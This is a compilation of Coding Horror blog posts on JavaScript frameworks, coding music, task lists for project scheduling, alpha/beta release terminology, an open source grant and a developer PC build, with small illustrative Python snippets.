One ingredient of its meaning is certainly Ajax, which I can still only just bear to use without scare quotes. Basically, what "Ajax" means is "Javascript now works." And that in turn means that web-based applications can now be made to work much more like desktop ones.
Three years on, I can't argue the point: JavaScript now works. Just look around you on the web.
Well, to a point. We can no longer luxuriate in the -- and to be clear, I mean this ironically -- golden age of Internet Explorer 6. We live in a brave new era of increasing browser competition, and that's a good thing. Yes, JavaScript is now mature enough and ubiquitous enough and fast enough to be a viable client programming runtime. But this vibrant browser competition also means there are hundreds of aggravating differences in JavaScript implementations between Opera, Safari, Internet Explorer, and Firefox. And that's just the big four. It is excruciatingly painful to write and test your complex JavaScript code across (n) browsers and (n) operating systems. It'll make you pine for the good old days of HTML 4.0 and CGI.
But now something else is happening, something arguably even more significant than "JavaScript now works". The rise of commonly available JavaScript frameworks means you can write to higher level JavaScript APIs that are guaranteed to work across multiple browsers. These frameworks spackle over the JavaScript implementation differences between browsers, and they've (mostly) done all the ugly grunt work of testing their APIs and validating them against a host of popular browsers and platforms.
The JavaScript Ninjas have delivered their secret and ultimate weapon: common APIs. They transform working with JavaScript from an unpleasant, write-once-debug-everywhere chore into something that's actually -- dare I say it -- fun.
Frankly, it is foolish to even consider rolling your own JavaScript code to do even the most trivial of things in a browser now. Instead, choose one of these mature, widely tested JavaScript API frameworks. Spend a little time learning it. You'll ultimately write less code that does more -- and (almost) never have to worry a lick about browser compatibility. It's basically browser coding nirvana, as Rick Strahl noted:
I've kind of fallen into a couple of very client heavy projects and jQuery is turning out to be a key part in these particular projects. jQuery is definitely one of those tools that has got me really excited as it has changed my perspective in Web Development considerably from dreading doing client development to actually looking forward to applying richer and more interactive client principles.
There are several popular JavaScript API frameworks to choose from:
I don't profess to be an expert in any of these. Far from it. But I will echo what Rick said: using jQuery while writing Stack Overflow is probably the only time in my entire career as a programmer that I have enjoyed writing JavaScript code.
It's sure pleasant to write code against solid, increasingly standardized JavaScript API libraries that spackle over all those infuriating browser differences. I, for one, would like to thank John Resig and all the other JavaScript Ninjas who share their secrets -- and their frameworks -- with the rest of the community.
From Coding Horror, 2 months ago,
0 comments
Occasionally people will ask me what kind of music I like to code by. I'm not sure I am the right person to ask this question of.
Allow me to explain by citing my 2001 Amazon review of a particular album.
It all started so innocently. I purchased this CD on a lark in mid 1998. Subsequently, I put on this CD at high volume to torture my then-coworkers. It became a running joke. We'd take any opportunity, any pretext at all, to put it on. It had to be played at least once every day for "good luck." We'd force each other to listen to it. We'd have little contests to see who was man enough to listen to it over and over and still silently sit there programming away, not complaining. Sometimes we'd sing along to enhance the effect.
In short: we broke people. It was like a Vietnamese prison camp in stereo.
It was a joke. But then a very strange thing happened -- as I listened to the CD over and over, I began to like it. I mean really like it! I began to listen to it at home on my own time. "There's something about this music", I thought, as I listened to it for the 543rd time. "Maybe it's so bad, it has actually wrapped all the way around and it's.. good again?". I played the album for my wife. At that point I was hooked. I knew all the words to "Having my Baby", and.. I liked it!
For completeness, here's the track list. If you have any kind of musical taste, you may want to look away from the screen momentarily.
In a peculiar twist of fate, one of my then coworkers, Geoff, now works with me on Stack Overflow. He can confirm that what I said above actually happened, although I'm not sure you could make something like that up. Apparently his mind wasn't totally destroyed by exposure to this "music". As far as we know.
While I've mentioned mild forms of coworker griefing -- er, I mean, teambuilding -- before in Don't Forget to Lock Your Computer, I thought this audio form was unique.
What I didn't know then is that this sort of musical griefing had a precedent. It's documented in the 1994 book Show Stopper! The Breakneck Race to Create Windows NT and the Next Generation at Microsoft. I didn't get around to reading this excellent book until 2004, but it's right there in black and white:
[David] Cutler camped in the Build Lab now, scrutinizing the check-ins, so [Kyle] Shannon wanted him to be comfortable. After further musical experiments, he finally hit on a sound that pleased Cutler. It was a raucous album by the rock group Journey. One morning Shannon slapped on Journey, and heavy metal sounds filled the lab. Cutler started bobbing his head, humming to the cacophony. Shannon smiled. Nodding gratefully, Cutler promised to share with the builders a couple of his own favorite albums. He didn't have any favorite albums, but he saw a chance to relieve tension. That night he asked his companion, Deborah Girdler, to visit a CD store and buy something "really bad." She returned with two discs: Jim Nabors (star of the 1960s TV series Gomer Pyle, U.S.M.C.) singing gospel tunes and the fantasy characters Alvin and the Chipmunks singing children's songs. Perfect, Cutler thought.
The next day Cutler treated his builders to Nabors singing "In the Sweet Bye and Bye," "Onward Christian Soldiers" and other hymns. When Cutler sang along, everyone cringed; it was hard to tell which was more loathsome -- Nabors gone gospel or Cutler gone musical. No one cheered when Cutler asked to hear the Nabors disc over and over again, day after day.
Before long Shannon and the builders regretted ever awakening Cutler's musicality. They finally hid the Nabors disc on the floor under a desk. When Cutler asked for it, Shannon invariably said "It's in my car." Cutler, who caught the lie, laughed and laughed.
So the next time you ask one of your fellow programmers to put on some background coding music for the team, think twice. That's all I'm saying.
Now if you'll excuse me, I'm going to slip on my headphones and get back to coding while listening to one of my favorite albums, The Transformed Man.
Hey, Mr. Tambourine Man, play a song for me ...
From Coding Horror, 2 months ago,
0 comments
Although I love reading programming books, I find software project management books to be some of the most mind-numbingly boring reading I've ever attempted. I suppose this means I probably shouldn't be a project manager. The bad news for the Stack Overflow team is that I effectively am one.
That's not to say that all software project management books are crap. Just most of them. One of the few that I've found compelling enough to finish is Johanna Rothman's Behind Closed Doors: Secrets of Great Management.
After reading it, you'll realize this is the book they should be handing out to every newly minted software project manager. And you'll be deeply depressed because you don't work with any software project managers who apparently have read it.
I originally discovered Johanna when one of her pieces was cited in the original Spolsky Best Software Writing book. Her article on team compensation (pdf) basically blew my mind; it forced me to rethink my entire perspective on being paid to work at a job. You should read it. If you have a manager, you should get him or her to read it, too.
Since then, I've touched on her work briefly in Schedule Games and You Are Not Your Job. But I'd like to focus on a specific aspect of project management that I'm apparently not very good at. A caller in Podcast #16 took me to task for my original Stack Overflow schedule claims way back in late April. What was supposed to be "6 to 8 weeks" became.. well, something more like three months.
My problem is that I'm almost pathologically bad about writing things down. Unless I'm writing a blog entry, I suppose. I prefer to keep track of what I'm doing in my head, only anticipating as far ahead as the next item I plan to work on, while proceeding forward as quickly as I can. I think I fell prey, at least a little bit, to this scenario:
"Look, Mike," Tomas said. "I can hand off my code today and call it 'feature complete', but I've probably got three weeks of cleanup work to do once I hand it off." Mike asked what Tomas meant by "cleanup." "I haven't gotten the company logo to show up on every page, and I haven't gotten the agent's name and phone number to print on the bottom of every page. It's little stuff like that. All of the important stuff works fine. I'm 99-percent done."
Do you see the problem here? I know, there are so many it's difficult to know where to begin listing them all, but what's the deepest, most fundamental problem at work here?
This software developer does not have a detailed list of all the things he needs to do. Which means, despite adamantly claiming that he is 99 percent done -- he has no idea how long development will take! There's simply no factual basis for any of his schedule claims.
It is the job of a good software project manager to recognize the tell-tale symptoms of this classic mistake and address them head on before they derail the project. How? By forcing -- er, encouraging -- developers to create a detailed list of everything they need to do. And then breaking that list down into subitems. And then adding all the subitems they inevitably forgot because they didn't think that far ahead. Once you have all those items on a list, then -- and only then -- you can begin to estimate how long the work will take.
Until you've got at least the beginnings of a task list, any concept of scheduling is utter fantasy. A very pleasant fantasy, to be sure, but the real world can be extremely unforgiving to such dreams.
Johanna Rothman makes the same point in a recent email newsletter, and offers specific actions you can take to avoid being stuck 90% done:
List everything you need to do to finish the big chunk of work. I include any infrastructure work such as setting up branches in the source control system.
Estimate each item on that list. This initial estimate will help you see how long it might take to complete the entire task.
Now, look to see how long each item on that list will take to finish. If you have a task longer than one day, break that task into smaller pieces. Breaking larger tasks into these inch-pebbles is critical for escaping the 90% Done syndrome.
Determine a way to show visible status to anyone who's interested. If you're the person doing the work, what would you have to do to show your status to your manager? If you're the manager, what do you need to see? You might need to see lists of test cases or a demo or something else that shows you visible progress.
Since you've got one-day or smaller tasks, you can track your progress daily. I like to keep a chart or list of the tasks, my initial estimated end time and the actual end time for each task. This is especially important for you managers, so you can see if the person is being interrupted and therefore is multitasking. (See the article about the Split Focus schedule game.)
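The steps above fit in a few lines of Python. This is only a sketch of one way to keep such a list, not Johanna's method or any particular tool; the `Task` fields and function names are assumptions made for illustration.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Task:
    name: str
    estimate_days: float                 # initial estimate
    actual_days: Optional[float] = None  # filled in once the task is finished


def needs_splitting(tasks: List[Task], limit_days: float = 1.0) -> List[str]:
    """Names of tasks estimated at more than limit_days; break these into inch-pebbles."""
    return [t.name for t in tasks if t.estimate_days > limit_days]


def total_estimate(tasks: List[Task]) -> float:
    """Sum of the initial estimates, in days."""
    return sum(t.estimate_days for t in tasks)


def status(tasks: List[Task]) -> str:
    """Visible status: how many tasks have an actual end time recorded."""
    done = sum(1 for t in tasks if t.actual_days is not None)
    return f"{done} of {len(tasks)} tasks finished"
```

Feed it the "cleanup" items from Tomas's story (logo on every page, agent's name and phone number in the footer) and the vague "99-percent done" turns into a count of finished tasks and a list of items still too big to estimate.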
I'm not big on scheduling -- or lists -- but without the latter, I cannot have the former. It's like trying to defy the law of gravity. Thus, on our project, we're always 90% done. If you'd like to escape the 90% done ghetto on your software project, don't learn this the hard way, like I did. Every time someone asks you what your schedule is, you should be able to point to a list of everything you need to do. And if you can't -- the first item on your task list should be to create that list.
From Coding Horror, 2 months ago,
0 comments
Nathan Bowers pointed me to this five year old Cool Tools entry on the book Art & Fear.
Although I am not at all ready to call software development "art" -- perhaps "craft" would be more appropriate, or "engineering" if you're feeling generous -- the parallels between some of the advice offered here and my experience writing software are profound.
The ceramics teacher announced on opening day that he was dividing the class into two groups. All those on the left side of the studio, he said, would be graded solely on the quantity of work they produced, all those on the right solely on its quality. His procedure was simple: on the final day of class he would bring in his bathroom scales and weigh the work of the "quantity" group: fifty pound of pots rated an "A", forty pounds a "B", and so on. Those being graded on "quality", however, needed to produce only one pot - albeit a perfect one - to get an "A". Well, came grading time and a curious fact emerged: the works of highest quality were all produced by the group being graded for quantity. It seems that while the "quantity" group was busily churning out piles of work - and learning from their mistakes - the "quality" group had sat theorizing about perfection, and in the end had little more to show for their efforts than grandiose theories and a pile of dead clay.
Where have I heard this before?
Quantity always trumps quality. That's why the one bit of advice I always give aspiring bloggers is to pick a schedule and stick with it. It's the only advice that matters, because until you've mentally committed to doing it over and over, you will not improve. You can't.
When it comes to software, the same rule applies. If you aren't building, you aren't learning. Rather than agonizing over whether you're building the right thing, just build it. And if that one doesn't work, keep building until you get one that does.
From Coding Horror, 2 months ago,
0 comments
As we begin the private beta for Stack Overflow later this week, I wondered: where do the software terms alpha and beta come from? And why don't we ever use gamma?
Alpha and Beta are the first two characters of the Greek alphabet. Presumably these characters were chosen because they refer to the first and second rounds of software testing, respectively.
But where did these terms originate? There's an uncited Wikipedia section that claims the alpha and beta monikers came, as did so many other things, from the golden days of IBM:
The term beta test comes from an IBM hardware product test convention, dating back to punched card tabulating and sorting machines. Hardware first went through an alpha test for preliminary functionality and small scale manufacturing feasibility. Then came a beta test, by people or groups other than the developers, to verify that the hardware correctly performed the functions it was supposed to, and that it could be manufactured at scales necessary for the market. And finally, a c test to verify final safety. With the advent of programmable computers and the first shareable software programs, IBM used the same terminology for testing software. As other companies began developing software for their own use, and for distribution to others, the terminology stuck -- and is now part of our common vocabulary.
Based on the software release lifecycle page, and my personal experience, here's how I'd characterize each phase of software development:
The software is still under active development and not feature complete or ready for consumption by anyone other than software developers. There may be milestones during the pre-alpha which deliver specific sets of functionality, and nightly builds for other developers or users who are comfortable living on the absolute bleeding edge.
The software is complete enough for internal testing. This is typically done by people other than the software engineers who wrote it, but still within the same organization or community that developed the software.
The software is complete enough for external testing -- that is, by groups outside the organization or community that developed the software. Beta software is usually feature complete, but may have known limitations or bugs. Betas are either closed (private) and limited to a specific set of users, or they can be open to the general public.
The software is almost ready for final release. No feature development or enhancement of the software is undertaken; tightly scoped bug fixes are the only code you're allowed to write in this phase, and even then only for the most heinous and debilitating of bugs. One of the most experienced software developers I ever worked with characterized the release candidate development phase thusly: "does this bug kill small children?"
The software is finished -- and by finished, we mean there are no show-stopping, little-children-killing bugs in it. That we know of. There are probably numerous lower-priority bugs triaged into the next point release or service pack, as well.
These phases all sound perfectly familiar to me, although there are two clear trends:
In the brave new world of web 2.0, the alpha and beta designations don't mean quite the same things they used to. Perhaps the most troubling trend is the perpetual beta. So many websites stay in perpetual beta, it's almost become a running joke. GMail, for example, is still in beta after over four years!
Although I've seen plenty of release candidates in my day, I've rarely seen a "gamma" or "delta". Apparently Flickr used it for a while in their logo, after heroically soldiering on from beta:
"loves you" is certainly more fun than "gold", but I'm not sure it's ever the same as done. Maybe that's the way it should be.
From Coding Horror, 2 months ago,
0 comments
In April I donated $5,000 of the ad revenue from this website to an open source .NET project. It was exciting to be able to inject some of the energy from this blog into the often-neglected .NET open source ecosystem.
As I mentioned at the time, I used a very hands off approach. While I did have some up-front criteria for the award (open source license, public source control, accepts outside source contributions) it's basically a no-strings grant.
The real money is being sent via wire transfer to Dario Solera, the ScrewTurn Wiki project coordinator. What's Dario going to do with this money? You'll have to ask him. That's not for me to decide. There are no strings attached to this money of any kind. I trust the judgment of a fellow programmer to run their project as they see fit.
When I said the project could do whatever they saw fit with the money, I meant it. Buy liquor and cigarettes, throw a huge party, play it on the ponies. I'm not kidding. As long as the project team believes it's a valid way to move their project forward, whatever they say goes. It's their project, and their grant.
I hadn't heard anything from Dario, and I was curious, so I followed up with him via email. He sent back this response:
The grant money is still untouched. It’s not easy to use it. Website hosting fees are fully covered by ads and donations, and there are no other direct expenses to cover. I thought it would be cool to launch a small contest with prizes for the best plugins and/or themes, but that is not easy because of some laws we have here in Italy that render the handling of a contest quite complex. What would you suggest?
I was crushingly disappointed to find out the $5,000 in grant money has been sitting in the bank for the last four months, totally unused. That's painful to hear, possibly the most painful of all outcomes. Why did we bother doing this if nothing changes?
My friend Jon Galloway warned me this might happen. I didn't believe him. But what other conclusion can I draw at this point? He was right:
Open Source is to Traditional Software as Terror Cells are to Large Standing Armies – if you gave a terrorist group a fighter jet, they wouldn't know what to do with it. Open source teams, and culture, have been developed such that they're almost money-agnostic. Open source projects run on time, not money. So, the way to convert that currency is through bounties and funded internships. Unfortunately, setting those up takes time, and since that's the element that's in short supply, we're back to square one.
I had hoped that $5,000 grant money would be converted into something that furthered an open source project -- perhaps something involving the community and garnering more code contributions. But apparently that's more difficult than anyone realized.
Jon offered these ideas:
I must admit I'm at a bit of a loss here. Do you have any ideas for how the ScrewTurn Wiki project can use their $5,000 open source grant effectively? If so, please share them in the comments here, or on the ScrewTurn forum -- in the Suggestions and Feature Requests area.
Even I'm not naive enough to suggest that money can solve every open source software problem. But I don't have a lot of time to contribute; I only have advertising revenue. I'm absolutely dumbfounded to learn that contributing money isn't an effective way to advance an open source project. Surely money can't be totally useless to open source projects... can it?
From Coding Horror, 2 months ago,
0 comments
I got a call from Rob Conery today asking for advice on building his own computer. Rob works for Microsoft, but lives in Hawaii. I'm not sure how he managed that, but being so far from the mothership apparently means he has the flexibility to spec his own PC. Being stuck in Hawaii is, I'm sure, a total bummer, dude.
Rob and I may disagree on pretty much everything from a coding perspective, but we can agree on one thing: we love computers. And what better way to celebrate that love than by building your own? It's not hard. This industry was built on the commodification of hardware. If you can snap together a lego kit, you can build a computer.
Maybe this is a minority opinion, but I find understanding the hardware to be instructive for programmers. Peter Norvig -- now director of research at Google -- appears to concur.
Understand how the hardware affects what you do. Know how long it takes your computer to execute an instruction, fetch a word from memory (with and without a cache miss), transfer data over ethernet (or the internet), read consecutive words from disk, and seek to a new location on disk.
In my book, there's no better way to understand the hardware than to get your hands dirty and slap one together, including installing the OS from scratch, yourself. It's a shame Apple programmers can't do this, as their hardware has to be blessed by the Cupertino DRM gods. Or, you could build a frankenmac, though you'll run the risk of running a "patched" OS X indefinitely.
As Rob and I were talking about the philosophy of building your own development PC -- something I also discussed on a Hanselminutes podcast -- he said you know, you should blog this. Ah, but Rob -- I already have! Let's walk down the core list of components I recommended for Rob, along with links to the relevant blog posts on that particular topic.
ASUS P5E Intel X38 motherboard ($225)
I'm a big triple monitor guy, so I insist on motherboards that are capable of accepting two video cards -- in other words, they have two x8 or x16 PCI Express card slots suitable for video cards. I also demand quiet from my PC, which means a motherboard with all passive cooling. Beyond that, I don't like to spend too much on the motherboard. After spending the last five years with motherboards packing scads of features I never end up using (two ethernet ports, anyone?), I've realized there are better ways to invest your money. People tend to respect ASUS as one of the largest and most established Taiwanese OEMs, so it's usually a safe choice. I'd go as far down on price on the motherboard as you can without losing whatever essential features you truly need. Save that money for the other parts.
Intel Core 2 Duo E8500 3.16 GHz CPU ($190)
Intel Core 2 Quad Q9300 2.5 GHz CPU ($270)
Ah, the eternal debate: dual versus quad. Despite what Intel's marketing weasels might want you to believe, clock speed still matters very much. Here's an example: SQL Server 2005 queries on my local box, a 3.5 GHz dual core, execute more than twice as fast as on our server, a 1.8 GHz eight core machine. Sadly, very few development environments parallelize well, with the notable exception of C++ compilers. Outside of a few niche activities, such as video encoding and professional 3D rendering, most computing tasks don't scale worth a damn beyond two cores. Yes, it's exciting to see those four graphs in Task Manager (and even I get a little giddy when I see thirty-two of 'em), but take a look at the cold, hard benchmark data and the contents of your wallet before letting that seductive 4 > 2 math hijack the rational parts of your brain.
It's also smart to buy a little below the maximum, with the ultimate goal of upgrading to a whizzy-bang 4 GHz quad core CPU sometime in the future. One of the hidden value propositions in building your own PC is the ability to easily upgrade it later. CPU is one of the most obvious upgrade points where you want to intentionally underbuy a little. Give yourself some room for future upgrades. Until a quad costs the same as a dual at the same clock speed, my vote still goes to the fastest dual core you can afford.
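If you want to put rough numbers on the dual-versus-quad question, here's a back-of-the-envelope sketch using Amdahl's law. It's a toy model, not a benchmark: the "score" is just clock speed multiplied by the Amdahl speedup, it assumes both chips do identical work per clock, and the parallel fractions in the loop are values I made up for illustration.

```python
def amdahl_speedup(parallel_fraction: float, cores: int) -> float:
    """Amdahl's law: speedup over one core when only part of the work parallelizes."""
    return 1.0 / ((1.0 - parallel_fraction) + parallel_fraction / cores)


def relative_throughput(clock_ghz: float, cores: int, parallel_fraction: float) -> float:
    """Crude score: clock speed times Amdahl speedup.

    Assumes identical work per clock on both chips, which is a simplification.
    """
    return clock_ghz * amdahl_speedup(parallel_fraction, cores)


if __name__ == "__main__":
    # The parallel fractions below are illustrative guesses, not measurements.
    for p in (0.0, 0.25, 0.5, 0.75, 0.95):
        dual = relative_throughput(3.16, 2, p)  # Core 2 Duo E8500
        quad = relative_throughput(2.5, 4, p)   # Core 2 Quad Q9300
        winner = "dual" if dual > quad else "quad"
        print(f"parallel={p:.2f}  dual={dual:.2f}  quad={quad:.2f}  -> {winner}")
```

Under these assumptions, the slower quad only pulls ahead once a bit under 60% of the workload runs in parallel. Whether your own workload clears that bar is something only real benchmarks can tell you.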
Kingston 4GB (2 x 2GB) DDR2 800 x 2 ($156)
Memory is awesomely cheap. When it comes to memory, I like to buy a few notches above the cheapest stuff, and Kingston has been a consistently reliable brand for me at that pricing level. There's no reason to bother with anything under 8 GB these days. Don't get hung up on memory speed, though. Quantity is more important than a few extra ticks of speed. But don't take my word for it. As an experiment, Digit-Life cut the speed of memory in half, with a resulting overall average performance loss of merely three percent. By the time your system has to reach outside of the L1, L2, and possibly even L3 cache -- it's already so slow from the system's perspective as to be academic. Memory that is a few extra nanoseconds faster isn't going to make any difference. Remember, kids, Caching Is Fundamental.
Western Digital VelociRaptor 300 GB 10,000 RPM Hard Drive ($290)
This is arguably the only indulgence on the list. The VelociRaptor is an incredibly expensive drive, but it's also a rocket of a hard drive. I'm a big believer in the importance of disk speed to overall system performance, particularly for software developers. At least Scott Guthrie backs me up on this one. Trust me, you want a 10,000 RPM boot drive. Buy a slower large drive for your archiving needs. You want two drives, anyway; having two spindles will give you a lot of flexibility and also help your virtual machine performance immensely.
This new Raptor model is easily the best of the series. It's much quieter, uses less power, generates less heat, and is by far the fastest of the bunch -- it's embarrassingly fast. It's expensive, yes. I won't hold it against you if you decide to disregard this advice and go with a respectably fast, less expensive hard drive. But to me, it's all about putting the money where the most significant bottlenecks are, and considered in that light -- man, this thing is so worth it. As Storage Review said, "[its] single-user scores .. blow away those of every other [hdd]".
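One piece of the 10,000 RPM advantage is simple arithmetic: on average, the platter has to spin half a revolution before the data you want arrives under the head. Here's a small sketch of that calculation. The 5,400 and 7,200 RPM figures are just common spindle speeds I picked for comparison, and this ignores seek time and transfer rate entirely.

```python
def avg_rotational_latency_ms(rpm: int) -> float:
    """Average wait for the target sector to rotate under the head: half a revolution."""
    ms_per_revolution = 60_000.0 / rpm  # 60,000 ms in a minute
    return ms_per_revolution / 2.0


if __name__ == "__main__":
    # 5400 and 7200 are comparison points chosen for illustration.
    for rpm in (5400, 7200, 10_000):
        latency = avg_rotational_latency_ms(rpm)
        print(f"{rpm:>6} RPM: {latency:.2f} ms average rotational latency")
```

That works out to 3 ms at 10,000 RPM versus a little over 4 ms at 7,200 RPM. It's only one factor in real-world disk performance, but it's paid on nearly every random access.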
Radeon HD 4850 512MB video card ($155 after rebate)
Even if you're not a gamer, it's hard to ignore the charms of this amazing powerhouse of a video card. For a measly hundred and fifty bucks, this card delivers performance on par with the very fastest $500+ video cards you can buy! Modern operating systems require video grunt. Beyond that, it's looking more and more like some highly parallelizable tasks may move to the GPU. Have you ever read stuff like "even the slowest GPU implementation was nearly 6 times faster than the best-performing CPU version"? Get used to reading statements like that; it's a harbinger of the future. That's another reason, as a programmer and not necessarily a gamer, you still want a modern video card. For all this talk of our manycore CPU future, eventually the GPU could be the death of the general purpose CPU.
We also want our video card to be efficient. Many don't realize this, but your video card can consume as much power as your CPU. Sometimes even more! The 4850, for all its muscle, is remarkably efficient as well. According to a recent AnandTech roundup, it's on par with the most efficient cards of this generation. Pay attention to your idle power consumption, because power consumed means heat produced, which in turn means additional noise and possible instability.
Corsair 520HX 520W Power Supply ($100 after rebate)
The power supply is probably one of the most underrated and misunderstood components of a modern PC. First, people tend to focus on the "watts" number when the really important number is actually efficiency -- a certain percentage of the energy that goes into every power supply is turned into waste heat. An efficient power supply wastes less of that energy, so it runs cooler, and it tends to be more reliable because it uses higher quality parts. Second, people think you need 1.21 Jigawatts to run a powerful desktop system, but that's just not true. Unless you have a bleeding-edge CPU paired with two high-end, top of the line, gaming class video cards, trust me -- even 500 watts is overkill.
The Corsair model I recommend gets stellar reviews. It has modular cables and the 80 PLUS certification, which means it's at least 80% efficient at 20%, 50%, and 100% of its rated load. Note that a quality power supply is not a substitute for a quality UPS or surge protector, but it helps.
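To see why efficiency matters more than the headline wattage, here's a quick sketch of the arithmetic. The 200 watt load and the 70% comparison supply are hypothetical numbers I chose for illustration, not measurements of any particular system or product.

```python
def wall_draw_watts(dc_load_watts: float, efficiency: float) -> float:
    """Power pulled from the outlet to deliver dc_load_watts to the components."""
    if not 0.0 < efficiency <= 1.0:
        raise ValueError("efficiency must be in (0, 1]")
    return dc_load_watts / efficiency


def waste_heat_watts(dc_load_watts: float, efficiency: float) -> float:
    """Power lost inside the supply as heat: wall draw minus delivered load."""
    return wall_draw_watts(dc_load_watts, efficiency) - dc_load_watts


if __name__ == "__main__":
    load = 200.0  # hypothetical DC load in watts
    for eff in (0.70, 0.80):  # 0.70 is an assumed less efficient supply
        wall = wall_draw_watts(load, eff)
        heat = waste_heat_watts(load, eff)
        print(f"{eff:.0%} efficient: {wall:.1f} W at the wall, {heat:.1f} W of waste heat")
```

At the same load, the 80% supply turns about 50 watts into heat while the 70% one turns nearly 86 watts into heat. That extra heat has to be pushed out by a fan, which is exactly the noise you're trying to avoid.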
Scythe "Ninja" SCNJ-2000 cooler ($50)
Scythe "Ninja Mini" SCMNJ-1000 cooler ($35)
I'll be honest with you. I have a giant heatsink fetish. These giant hunks of aluminum and copper, and the liquid-filled heatpipes that drive them, fascinate me. But there's a more practical reason, as well: if you want a quiet computer, you don't even bother with the stock coolers that are bundled with the CPU. Over the last few years, I've kept coming back to Scythe's classic "Ninja" tower cooler, which is available in tall and short varieties. They're so astoundingly efficient that, with adequate case ventilation, they can be run fanless. I even (barely) managed to squeeze the Ninja Mini into my home theater PC build, and it's now mercifully fanless as well. There are plenty of other great tower/heatpipe coolers on the market, but the Ninja is still one of the best, a testament to its pioneering design. The CPU is (usually) the biggest consumer of power in your PC, so it's sensible to invest in a highly efficient aftermarket cooler to keep noise and heat at bay under load.
There you have it. More than you ever possibly wanted to know about how an obsessive geek builds a PC -- painstakingly analyzing every single part that goes into it. Now, like Rob, you're probably sorry you asked; who needs all the philosophical digressions, just give us the damn parts list! OK, here it is:
The best bang for the buck developer x86 box I can come up with, all for around $1100.
I try to avoid posting about hardware too much, but sometimes I can't help myself. I blame Rob. Enjoy your new system, Mr. Conery.